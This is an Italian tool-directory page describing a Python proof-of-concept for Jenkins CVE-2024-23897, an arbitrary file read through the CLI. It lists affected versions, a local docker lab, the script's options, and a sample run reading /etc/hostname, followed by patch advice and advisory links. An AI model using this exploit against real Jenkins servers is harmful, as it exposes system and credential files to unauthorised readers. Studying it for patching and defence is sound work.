Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Jenkins-CVE-2024-23897 — PoC Python per Jenkins CVE-2024-23897 lettura arbitraria di file tramite CLI, che espone la divulgazione di file non autenticata con molteplici metodi di sfruttamento. | Kitploit
Strumenti/GitHubGitHub/abraxa5/jenkins-cve-2024-23897
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingRed Teaming
GitHubabraxa5/jenkins-cve-2024-23897

Jenkins-CVE-2024-23897

PoC Python per Jenkins CVE-2024-23897 lettura arbitraria di file tramite CLI, che espone la divulgazione di file non autenticata con molteplici metodi di sfruttamento.

Vedi RepositorySito web
1112 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Jenkins CVE-2024-23897 PoC

Una proof-of-concept (PoC) per CVE-2024-23897, una vulnerabilità di lettura arbitraria di file nell'interfaccia a riga di comando (CLI) integrata di Jenkins. Consente ad attaccanti non autenticati con autorizzazione Overall/Read di leggere file arbitrari sul file system del controller Jenkins.

Versioni Affette

  • Versioni di Jenkins <= 2.441
  • Versioni LTS di Jenkins <= 2.426.2

Avvia un'istanza vulnerabile

Avvia un'istanza locale vulnerabile usando docker compose:

root@kitploit:~
cd docker
docker compose up -d

L'istanza sarà disponibile su http://localhost:1234

Sfruttamento

root@kitploit:~
❯ python CVE-2024-23897.py --help
usage: CVE-2024-23897.py [-h] [--url URL] [--file FILE] [--method {1,2,3}]

Jenkins CVE-2024-23897 file-read PoC

options:
  -h, --help        show this help message and exit
  --url URL         URL for Jenkins instance (default: http://localhost:1234)
  --file FILE       File to read (default: /etc/hostname)
  --method {1,2,3}  The method to use [connect-node(1), who-am-i(2), or help(3)] (default: 1)

Esempio

root@kitploit:~
❯ python CVE-2024-23897.py --url 'http://127.0.0.1:1234/' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL http://127.0.0.1:1234/cli?remoting=false
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...


ERROR: No such agent "jenkins_vuln_instance" exists.

[i] Upload request done
[i] All threads completed

Lo script potrebbe avere problemi nella lettura di file più grandi a causa di concorrenza e timeout di connessione. Per ulteriori dettagli tecnici e una guida sulla vulnerabilità, dai un'occhiata al mio post sul blog sull'argomento.

Correzione

  • Aggiornare a Jenkins 2.442 o LTS 2.426.3
  • Applicare workaround temporanei come descritto nell'avviso di sicurezza di Jenkins.

Link Correlati

  • Sonar Source | Espansione Eccessiva: Scoprire Vulnerabilità Critiche di Sicurezza in Jenkins
  • Avviso di Sicurezza Jenkins - 2024-01-24
  • Qualys ThreatPROTECT | Vulnerabilità di Esecuzione Remota di Codice in Jenkins Core (CVE-2024-23897)
  • CVE-2024-23897: Valutare l'Impatto della Vulnerabilità di Perdita di File Arbitraria in Jenkins – Horizon3.ai
Scarica lo strumento